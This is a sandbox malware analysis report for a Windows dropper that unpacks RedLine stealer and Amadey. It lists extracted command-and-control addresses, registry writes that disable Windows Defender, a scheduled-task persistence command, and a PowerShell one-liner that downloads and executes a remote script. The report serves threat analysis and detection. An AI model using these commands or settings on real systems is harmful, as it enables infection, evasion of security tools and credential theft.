Windows 7 deprecation
Windows 7 will be removed from tria.ge on 2025-03-31
Analysis
-
max time kernel
147s -
max time network
144s -
platform
windows10-2004_x64 -
resource
win10v2004-20230220-en -
resource tags
arch:x64arch:x86image:win10v2004-20230220-enlocale:en-usos:windows10-2004-x64system -
submitted
21/03/2023, 05:09
Static task
static1
General
-
Target
9565bcdc6130f22e329773ec2e9a6b2045433ee79b43df387763bc0f81124eb2.exe
-
Size
1018KB
-
MD5
e6c36c04d3df6db69d2c3a2f223133ce
-
SHA1
f5f1a7b2092497e5f8159a8b1233a88273a375d7
-
SHA256
9565bcdc6130f22e329773ec2e9a6b2045433ee79b43df387763bc0f81124eb2
-
SHA512
1650814e1c2c6bbb26c976cae6cf40bdee7cb5dcb16f419cbc2d8cbae77b44a5825d6b99ba94fe3191bb2221ce40823c6d81140d692ea9b579b94aed589f7f8d
-
SSDEEP
12288:BMrLy9054K3BGIjKqplqxTv2ugTMUoK4nw0E3kpVnJa6TKN/+dBmRzoK8JOkOYRX:6y6eqjkubhoKSw0ZpzmN/6gEukOYRKa
Malware Config
Extracted
https://www.mdegmm.com/pdf/debug2.ps1
Extracted
redline
gena
193.233.20.30:4125
-
auth_value
93c20961cb6b06b2d5781c212db6201e
Extracted
redline
vint
193.233.20.30:4125
-
auth_value
fb8811912f8370b3d23bffda092d88d0
Extracted
amadey
3.68
62.204.41.87/joomla/index.php
Signatures
-
description ioc Process Key created \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection tz8593.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" tz8593.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection v3490Id.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" v3490Id.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" v3490Id.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" tz8593.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableIOAVProtection = "1" tz8593.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableRealtimeMonitoring = "1" tz8593.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" tz8593.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableBehaviorMonitoring = "1" v3490Id.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableOnAccessProtection = "1" v3490Id.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Policies\Microsoft\Windows Defender\Real-Time Protection\DisableScanOnRealtimeEnable = "1" v3490Id.exe -
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
-
RedLine payload 19 IoCs
resource yara_rule behavioral1/memory/2276-210-0x00000000029F0000-0x0000000002A2E000-memory.dmp family_redline behavioral1/memory/2276-213-0x00000000029F0000-0x0000000002A2E000-memory.dmp family_redline behavioral1/memory/2276-215-0x00000000029F0000-0x0000000002A2E000-memory.dmp family_redline behavioral1/memory/2276-211-0x00000000029F0000-0x0000000002A2E000-memory.dmp family_redline behavioral1/memory/2276-217-0x00000000029F0000-0x0000000002A2E000-memory.dmp family_redline behavioral1/memory/2276-219-0x00000000029F0000-0x0000000002A2E000-memory.dmp family_redline behavioral1/memory/2276-221-0x00000000029F0000-0x0000000002A2E000-memory.dmp family_redline behavioral1/memory/2276-223-0x00000000029F0000-0x0000000002A2E000-memory.dmp family_redline behavioral1/memory/2276-225-0x00000000029F0000-0x0000000002A2E000-memory.dmp family_redline behavioral1/memory/2276-227-0x00000000029F0000-0x0000000002A2E000-memory.dmp family_redline behavioral1/memory/2276-229-0x00000000029F0000-0x0000000002A2E000-memory.dmp family_redline behavioral1/memory/2276-231-0x00000000029F0000-0x0000000002A2E000-memory.dmp family_redline behavioral1/memory/2276-233-0x00000000029F0000-0x0000000002A2E000-memory.dmp family_redline behavioral1/memory/2276-235-0x00000000029F0000-0x0000000002A2E000-memory.dmp family_redline behavioral1/memory/2276-237-0x00000000029F0000-0x0000000002A2E000-memory.dmp family_redline behavioral1/memory/2276-239-0x00000000029F0000-0x0000000002A2E000-memory.dmp family_redline behavioral1/memory/2276-241-0x00000000029F0000-0x0000000002A2E000-memory.dmp family_redline behavioral1/memory/2276-243-0x00000000029F0000-0x0000000002A2E000-memory.dmp family_redline behavioral1/memory/2276-249-0x0000000000C70000-0x0000000000C80000-memory.dmp family_redline -
Blocklisted process makes network request 6 IoCs
flow pid Process 66 3240 powershell.exe 67 4760 powershell.exe 69 1952 powershell.exe 70 4760 powershell.exe 71 3240 powershell.exe 75 1952 powershell.exe -
Downloads MZ/PE file
-
Checks computer location settings 2 TTPs 5 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation sqlcmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation y66Vj02.exe Key value queried \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation legenda.exe Key value queried \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation sqlcmd.exe Key value queried \REGISTRY\USER\S-1-5-21-1013461898-3711306144-4198452673-1000\Control Panel\International\Geo\Nation sqlcmd.exe -
Executes dropped EXE 14 IoCs
pid Process 4008 zap1634.exe 4248 zap3590.exe 4644 zap8183.exe 4924 tz8593.exe 5032 v3490Id.exe 2276 w88ix95.exe 4612 xKlzG57.exe 2152 y66Vj02.exe 2696 legenda.exe 4492 sqlcmd.exe 2192 sqlcmd.exe 4944 sqlcmd.exe 1496 legenda.exe 504 legenda.exe -
Loads dropped DLL 1 IoCs
pid Process 3656 rundll32.exe -
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
description ioc Process Set value (int) \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Features\TamperProtection = "0" tz8593.exe Key created \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features v3490Id.exe Set value (int) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows Defender\Features\TamperProtection = "0" v3490Id.exe -
Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
-
Adds Run key to start application 2 TTPs 8 IoCs
description ioc Process Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP000.TMP\\\"" 9565bcdc6130f22e329773ec2e9a6b2045433ee79b43df387763bc0f81124eb2.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce zap1634.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup1 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP001.TMP\\\"" zap1634.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce zap3590.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup2 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP002.TMP\\\"" zap3590.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce zap8183.exe Set value (str) \REGISTRY\MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup3 = "rundll32.exe C:\\Windows\\system32\\advpack.dll,DelNodeRunDLL32 \"C:\\Users\\Admin\\AppData\\Local\\Temp\\IXP003.TMP\\\"" zap8183.exe Key created \REGISTRY\MACHINE\Software\WOW6432Node\Microsoft\Windows\CurrentVersion\RunOnce 9565bcdc6130f22e329773ec2e9a6b2045433ee79b43df387763bc0f81124eb2.exe -
Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.
-
Program crash 2 IoCs
pid pid_target Process procid_target 2820 5032 WerFault.exe 94 4692 2276 WerFault.exe 100 -
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 4700 schtasks.exe -
Runs ping.exe 1 TTPs 3 IoCs
pid Process 4364 PING.EXE 3132 PING.EXE 636 PING.EXE -
Suspicious behavior: EnumeratesProcesses 15 IoCs
pid Process 4924 tz8593.exe 4924 tz8593.exe 5032 v3490Id.exe 5032 v3490Id.exe 2276 w88ix95.exe 2276 w88ix95.exe 4612 xKlzG57.exe 4612 xKlzG57.exe 3240 powershell.exe 3240 powershell.exe 4760 powershell.exe 4760 powershell.exe 1952 powershell.exe 1952 powershell.exe 1952 powershell.exe -
Suspicious use of AdjustPrivilegeToken 7 IoCs
description pid Process Token: SeDebugPrivilege 4924 tz8593.exe Token: SeDebugPrivilege 5032 v3490Id.exe Token: SeDebugPrivilege 2276 w88ix95.exe Token: SeDebugPrivilege 4612 xKlzG57.exe Token: SeDebugPrivilege 3240 powershell.exe Token: SeDebugPrivilege 4760 powershell.exe Token: SeDebugPrivilege 1952 powershell.exe -
Suspicious use of WriteProcessMemory 64 IoCs
description pid Process procid_target PID 4204 wrote to memory of 4008 4204 9565bcdc6130f22e329773ec2e9a6b2045433ee79b43df387763bc0f81124eb2.exe 86 PID 4204 wrote to memory of 4008 4204 9565bcdc6130f22e329773ec2e9a6b2045433ee79b43df387763bc0f81124eb2.exe 86 PID 4204 wrote to memory of 4008 4204 9565bcdc6130f22e329773ec2e9a6b2045433ee79b43df387763bc0f81124eb2.exe 86 PID 4008 wrote to memory of 4248 4008 zap1634.exe 87 PID 4008 wrote to memory of 4248 4008 zap1634.exe 87 PID 4008 wrote to memory of 4248 4008 zap1634.exe 87 PID 4248 wrote to memory of 4644 4248 zap3590.exe 88 PID 4248 wrote to memory of 4644 4248 zap3590.exe 88 PID 4248 wrote to memory of 4644 4248 zap3590.exe 88 PID 4644 wrote to memory of 4924 4644 zap8183.exe 89 PID 4644 wrote to memory of 4924 4644 zap8183.exe 89 PID 4644 wrote to memory of 5032 4644 zap8183.exe 94 PID 4644 wrote to memory of 5032 4644 zap8183.exe 94 PID 4644 wrote to memory of 5032 4644 zap8183.exe 94 PID 4248 wrote to memory of 2276 4248 zap3590.exe 100 PID 4248 wrote to memory of 2276 4248 zap3590.exe 100 PID 4248 wrote to memory of 2276 4248 zap3590.exe 100 PID 4008 wrote to memory of 4612 4008 zap1634.exe 106 PID 4008 wrote to memory of 4612 4008 zap1634.exe 106 PID 4008 wrote to memory of 4612 4008 zap1634.exe 106 PID 4204 wrote to memory of 2152 4204 9565bcdc6130f22e329773ec2e9a6b2045433ee79b43df387763bc0f81124eb2.exe 112 PID 4204 wrote to memory of 2152 4204 9565bcdc6130f22e329773ec2e9a6b2045433ee79b43df387763bc0f81124eb2.exe 112 PID 4204 wrote to memory of 2152 4204 9565bcdc6130f22e329773ec2e9a6b2045433ee79b43df387763bc0f81124eb2.exe 112 PID 2152 wrote to memory of 2696 2152 y66Vj02.exe 113 PID 2152 wrote to memory of 2696 2152 y66Vj02.exe 113 PID 2152 wrote to memory of 2696 2152 y66Vj02.exe 113 PID 2696 wrote to memory of 4700 2696 legenda.exe 114 PID 2696 wrote to memory of 4700 2696 legenda.exe 114 PID 2696 wrote to memory of 4700 2696 legenda.exe 114 PID 2696 wrote to memory of 3288 2696 legenda.exe 116 PID 2696 wrote to memory of 3288 2696 legenda.exe 116 PID 2696 wrote to memory of 3288 2696 legenda.exe 116 PID 3288 wrote to memory of 4932 3288 cmd.exe 118 PID 3288 wrote to memory of 4932 3288 cmd.exe 118 PID 3288 wrote to memory of 4932 3288 cmd.exe 118 PID 3288 wrote to memory of 216 3288 cmd.exe 119 PID 3288 wrote to memory of 216 3288 cmd.exe 119 PID 3288 wrote to memory of 216 3288 cmd.exe 119 PID 3288 wrote to memory of 228 3288 cmd.exe 120 PID 3288 wrote to memory of 228 3288 cmd.exe 120 PID 3288 wrote to memory of 228 3288 cmd.exe 120 PID 3288 wrote to memory of 4704 3288 cmd.exe 121 PID 3288 wrote to memory of 4704 3288 cmd.exe 121 PID 3288 wrote to memory of 4704 3288 cmd.exe 121 PID 3288 wrote to memory of 4688 3288 cmd.exe 122 PID 3288 wrote to memory of 4688 3288 cmd.exe 122 PID 3288 wrote to memory of 4688 3288 cmd.exe 122 PID 3288 wrote to memory of 1848 3288 cmd.exe 123 PID 3288 wrote to memory of 1848 3288 cmd.exe 123 PID 3288 wrote to memory of 1848 3288 cmd.exe 123 PID 2696 wrote to memory of 4492 2696 legenda.exe 124 PID 2696 wrote to memory of 4492 2696 legenda.exe 124 PID 2696 wrote to memory of 4492 2696 legenda.exe 124 PID 4492 wrote to memory of 2184 4492 sqlcmd.exe 125 PID 4492 wrote to memory of 2184 4492 sqlcmd.exe 125 PID 2696 wrote to memory of 2192 2696 legenda.exe 127 PID 2696 wrote to memory of 2192 2696 legenda.exe 127 PID 2696 wrote to memory of 2192 2696 legenda.exe 127 PID 2184 wrote to memory of 3240 2184 cmd.exe 128 PID 2184 wrote to memory of 3240 2184 cmd.exe 128 PID 2192 wrote to memory of 3540 2192 sqlcmd.exe 129 PID 2192 wrote to memory of 3540 2192 sqlcmd.exe 129 PID 3540 wrote to memory of 4760 3540 cmd.exe 131 PID 3540 wrote to memory of 4760 3540 cmd.exe 131
Processes
-
C:\Users\Admin\AppData\Local\Temp\9565bcdc6130f22e329773ec2e9a6b2045433ee79b43df387763bc0f81124eb2.exe"C:\Users\Admin\AppData\Local\Temp\9565bcdc6130f22e329773ec2e9a6b2045433ee79b43df387763bc0f81124eb2.exe"1⤵
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4204 -
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\zap1634.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\zap1634.exe2⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4008 -
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zap3590.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\zap3590.exe3⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4248 -
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\zap8183.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\zap8183.exe4⤵
- Executes dropped EXE
- Adds Run key to start application
- Suspicious use of WriteProcessMemory
PID:4644 -
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tz8593.exeC:\Users\Admin\AppData\Local\Temp\IXP003.TMP\tz8593.exe5⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4924
-
-
C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v3490Id.exeC:\Users\Admin\AppData\Local\Temp\IXP003.TMP\v3490Id.exe5⤵
- Modifies Windows Defender Real-time Protection settings
- Executes dropped EXE
- Windows security modification
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:5032 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 5032 -s 10806⤵
- Program crash
PID:2820
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w88ix95.exeC:\Users\Admin\AppData\Local\Temp\IXP002.TMP\w88ix95.exe4⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2276 -
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 2276 -s 13485⤵
- Program crash
PID:4692
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xKlzG57.exeC:\Users\Admin\AppData\Local\Temp\IXP001.TMP\xKlzG57.exe3⤵
- Executes dropped EXE
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4612
-
-
-
C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y66Vj02.exeC:\Users\Admin\AppData\Local\Temp\IXP000.TMP\y66Vj02.exe2⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2152 -
C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe"C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe"3⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2696 -
C:\Windows\SysWOW64\schtasks.exe"C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN legenda.exe /TR "C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe" /F4⤵
- Creates scheduled task(s)
PID:4700
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\System32\cmd.exe" /k echo Y|CACLS "legenda.exe" /P "Admin:N"&&CACLS "legenda.exe" /P "Admin:R" /E&&echo Y|CACLS "..\f22b669919" /P "Admin:N"&&CACLS "..\f22b669919" /P "Admin:R" /E&&Exit4⤵
- Suspicious use of WriteProcessMemory
PID:3288 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵PID:4932
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "legenda.exe" /P "Admin:N"5⤵PID:216
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "legenda.exe" /P "Admin:R" /E5⤵PID:228
-
-
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /S /D /c" echo Y"5⤵PID:4704
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\f22b669919" /P "Admin:N"5⤵PID:4688
-
-
C:\Windows\SysWOW64\cacls.exeCACLS "..\f22b669919" /P "Admin:R" /E5⤵PID:1848
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000107001\sqlcmd.exe"C:\Users\Admin\AppData\Local\Temp\1000107001\sqlcmd.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:4492 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')"5⤵
- Suspicious use of WriteProcessMemory
PID:2184 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:3240
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\1000107001\sqlcmd.exe" >> NUL5⤵PID:2136
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:4364
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000108001\sqlcmd.exe"C:\Users\Admin\AppData\Local\Temp\1000108001\sqlcmd.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
PID:2192 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')"5⤵
- Suspicious use of WriteProcessMemory
PID:3540 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:4760
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\1000108001\sqlcmd.exe" >> NUL5⤵PID:1900
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:636
-
-
-
-
C:\Users\Admin\AppData\Local\Temp\1000109001\sqlcmd.exe"C:\Users\Admin\AppData\Local\Temp\1000109001\sqlcmd.exe"4⤵
- Checks computer location settings
- Executes dropped EXE
PID:4944 -
C:\Windows\system32\cmd.exe"C:\Windows\sysnative\cmd.exe" /c "powershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')"5⤵PID:1524
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -command IEX(New-Object Net.Webclient).DownloadString('https://www.mdegmm.com/pdf/debug2.ps1')6⤵
- Blocklisted process makes network request
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:1952
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c ping 127.0.0.1 && del "C:\Users\Admin\AppData\Local\Temp\1000109001\sqlcmd.exe" >> NUL5⤵PID:3696
-
C:\Windows\SysWOW64\PING.EXEping 127.0.0.16⤵
- Runs ping.exe
PID:3132
-
-
-
-
C:\Windows\SysWOW64\rundll32.exe"C:\Windows\System32\rundll32.exe" C:\Users\Admin\AppData\Roaming\a091ec0a6e2227\clip64.dll, Main4⤵
- Loads dropped DLL
PID:3656
-
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 5032 -ip 50321⤵PID:648
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -pss -s 460 -p 2276 -ip 22761⤵PID:5040
-
C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exeC:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe1⤵
- Executes dropped EXE
PID:1496
-
C:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exeC:\Users\Admin\AppData\Local\Temp\f22b669919\legenda.exe1⤵
- Executes dropped EXE
PID:504
Network
MITRE ATT&CK Enterprise v6
Replay Monitor
Loading Replay Monitor...
Downloads
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\5080DC7A65DB6A5960ECD874088F3328_862BA1770B2FEE013603D2FF9ABEAFDA
Filesize2KB
MD5fc88b7748eb4cd37ae886a1c0813e4cf
SHA123e30b76fc94f0467a3efad342a91a3b84ff1eea
SHA2563d81e317f8816680185517d7719e51fdbcd5807f9c629c4e3d0408820ec458da
SHA512bb8ffaa2e8e581aa8d9a2e39b5f16c784d1431b4c18acc71b8fea84a4982d13a8ed1e5cf295c459ca35d8d4604c050210e0771386e7fe57d35c5ccd41fb92211
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\B2FAF7692FD9FFBD64EDE317E42334BA_2DBE917624E9880FE0C7C5570D56E691
Filesize1KB
MD5cb684ec7fe8555f949182c7423dafdc2
SHA1ec49f7b4b777fa1da40af5328785782127ffc52c
SHA2568e17b090e2d07abf04860e961e601d8c663d3eaafd16190e6e6b6a4f018c0b0e
SHA512ef627ca15ac143710b707ce28bd0cbe3447446db64c61f89d78f7c868cad07bd267563a7927ac4cd733adf2da3d58dcfadba54f8e0bc78e06d79cd389b77e500
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\5080DC7A65DB6A5960ECD874088F3328_862BA1770B2FEE013603D2FF9ABEAFDA
Filesize482B
MD5be8089479855e7c02e5208f961645196
SHA170eed5e48591356af217b0a61ae2f6f5d8cbc91a
SHA256ff7a5c67b83fa232cfcea4909ee6d9c29e85a891e95c24ef5ec6cb009f8b37b3
SHA51261df4db534338288c35a3dec5271660b78f99622b1f4dcc92a24bf40ca107f787a8f6ca74f47292488a8bdc05c130c6b65c0131e9ff5274a647801dd16862c2b
-
C:\Users\Admin\AppData\LocalLow\Microsoft\CryptnetUrlCache\MetaData\B2FAF7692FD9FFBD64EDE317E42334BA_2DBE917624E9880FE0C7C5570D56E691
Filesize486B
MD503b3b9b4bed5e3b3bde3705436fa8e61
SHA160bcc0b83c92e4a1a10cbebb56ad5afd55d824a7
SHA25673f1f67b7edaee7541d4e4dfe25be40d50c0229f2e357f0dc017cb51a295b8ba
SHA512c753364e942eef5f95785db22ce32f3441ad66eefebc16c29f3b8c5fd3753a379e465368a444376b7b00fca3f66f9bc3d43190658d8679a415db0a2c7c463c25
-
Filesize
144KB
MD5b5baf2e6261a1fb05bb2654c8d099dd6
SHA12a5b25fcb9e9f584d0a162b734c7dcc53c6e0550
SHA2564a98a49f3b4b3013d38069110fccb50850cb2a42088bf7b49054da5cc0ef7a0d
SHA5124ac6847ff23850bbdb04f696c85444ff2d1aa38cf508d60e6c1638e877b4233bf343e43cbcf84dd50151c593c5a181679488c207f8ea80dc088518f99e50d7d3
-
Filesize
144KB
MD5b5baf2e6261a1fb05bb2654c8d099dd6
SHA12a5b25fcb9e9f584d0a162b734c7dcc53c6e0550
SHA2564a98a49f3b4b3013d38069110fccb50850cb2a42088bf7b49054da5cc0ef7a0d
SHA5124ac6847ff23850bbdb04f696c85444ff2d1aa38cf508d60e6c1638e877b4233bf343e43cbcf84dd50151c593c5a181679488c207f8ea80dc088518f99e50d7d3
-
Filesize
144KB
MD5b5baf2e6261a1fb05bb2654c8d099dd6
SHA12a5b25fcb9e9f584d0a162b734c7dcc53c6e0550
SHA2564a98a49f3b4b3013d38069110fccb50850cb2a42088bf7b49054da5cc0ef7a0d
SHA5124ac6847ff23850bbdb04f696c85444ff2d1aa38cf508d60e6c1638e877b4233bf343e43cbcf84dd50151c593c5a181679488c207f8ea80dc088518f99e50d7d3
-
Filesize
144KB
MD5b5baf2e6261a1fb05bb2654c8d099dd6
SHA12a5b25fcb9e9f584d0a162b734c7dcc53c6e0550
SHA2564a98a49f3b4b3013d38069110fccb50850cb2a42088bf7b49054da5cc0ef7a0d
SHA5124ac6847ff23850bbdb04f696c85444ff2d1aa38cf508d60e6c1638e877b4233bf343e43cbcf84dd50151c593c5a181679488c207f8ea80dc088518f99e50d7d3
-
Filesize
144KB
MD5b5baf2e6261a1fb05bb2654c8d099dd6
SHA12a5b25fcb9e9f584d0a162b734c7dcc53c6e0550
SHA2564a98a49f3b4b3013d38069110fccb50850cb2a42088bf7b49054da5cc0ef7a0d
SHA5124ac6847ff23850bbdb04f696c85444ff2d1aa38cf508d60e6c1638e877b4233bf343e43cbcf84dd50151c593c5a181679488c207f8ea80dc088518f99e50d7d3
-
Filesize
144KB
MD5b5baf2e6261a1fb05bb2654c8d099dd6
SHA12a5b25fcb9e9f584d0a162b734c7dcc53c6e0550
SHA2564a98a49f3b4b3013d38069110fccb50850cb2a42088bf7b49054da5cc0ef7a0d
SHA5124ac6847ff23850bbdb04f696c85444ff2d1aa38cf508d60e6c1638e877b4233bf343e43cbcf84dd50151c593c5a181679488c207f8ea80dc088518f99e50d7d3
-
Filesize
144KB
MD5b5baf2e6261a1fb05bb2654c8d099dd6
SHA12a5b25fcb9e9f584d0a162b734c7dcc53c6e0550
SHA2564a98a49f3b4b3013d38069110fccb50850cb2a42088bf7b49054da5cc0ef7a0d
SHA5124ac6847ff23850bbdb04f696c85444ff2d1aa38cf508d60e6c1638e877b4233bf343e43cbcf84dd50151c593c5a181679488c207f8ea80dc088518f99e50d7d3
-
Filesize
235KB
MD55086db99de54fca268169a1c6cf26122
SHA1003f768ffcc99bda5cda1fb966fda8625a8fdc3e
SHA25642873b0c5899f64b5f3205a4f3146210cc63152e529c69d6292b037844c81ec4
SHA51290531b1b984b21ce62290b713ffc07917bbd766eef7d5e6f4c1c68b2fc7d29495cdd5f05fd71fe5107f1614bbb30922dcfb730f50599e44aeaff52c50f46b8b5
-
Filesize
235KB
MD55086db99de54fca268169a1c6cf26122
SHA1003f768ffcc99bda5cda1fb966fda8625a8fdc3e
SHA25642873b0c5899f64b5f3205a4f3146210cc63152e529c69d6292b037844c81ec4
SHA51290531b1b984b21ce62290b713ffc07917bbd766eef7d5e6f4c1c68b2fc7d29495cdd5f05fd71fe5107f1614bbb30922dcfb730f50599e44aeaff52c50f46b8b5
-
Filesize
835KB
MD58b165eaa50c9c922d3637e4f3a399242
SHA1fbfb96a9dc537b9a71532c7c8a88293767f992e4
SHA2569e35d48b5cef3eb5fde7c32ca994c2f7eae36823b5dd4c8f119bbcf9f3544df1
